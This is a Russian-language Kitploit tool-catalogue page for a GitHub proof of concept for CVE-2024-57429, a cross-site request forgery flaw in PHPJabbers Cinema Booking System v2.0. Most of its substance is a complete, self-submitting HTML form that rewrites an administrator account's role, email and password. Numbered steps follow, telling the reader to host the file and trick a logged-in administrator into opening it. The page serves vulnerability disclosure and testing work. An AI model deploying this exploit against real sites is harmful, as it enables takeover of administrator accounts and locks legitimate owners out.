Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 уязвим к CSRF, что позволяет злоумышленникам повышать привилегии, подделывая запросы от имени администратора. | Kitploit
Инструменты/GitHubGitHub/ahrixia/cve-2024-57429
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 уязвим к CSRF, что позволяет злоумышленникам повышать привилегии, подделывая запросы от имени администратора.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-57429

Уязвимость межсайтовой подделки запроса (CSRF) в функции pjActionUpdate системы бронирования кинотеатров PHPJabbers Cinema Booking System v2.0 позволяет удаленным злоумышленникам повышать привилегии, обманом заставляя аутентифицированного администратора отправить несанкционированный запрос.

Воздействие:

Эксплуатация этой уязвимости CSRF может привести к несанкционированным действиям, таким как:

  • Смена пароля администратора, что фактически блокирует ему доступ.
  • Повышение привилегий атакующего до администратора путем обновления его роли пользователя.

Эксплойт - Proof of Concept (POC)

Межсайтовая подделка запроса (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. Сохраните приведенный выше код как poc.html
  2. Разместите файл на сервере и обманом заставьте администратора открыть его, пока он авторизован в приложении.
  3. Учетная запись администратора будет обновлена с данными атакующего и новым паролем.
Скачать инструмент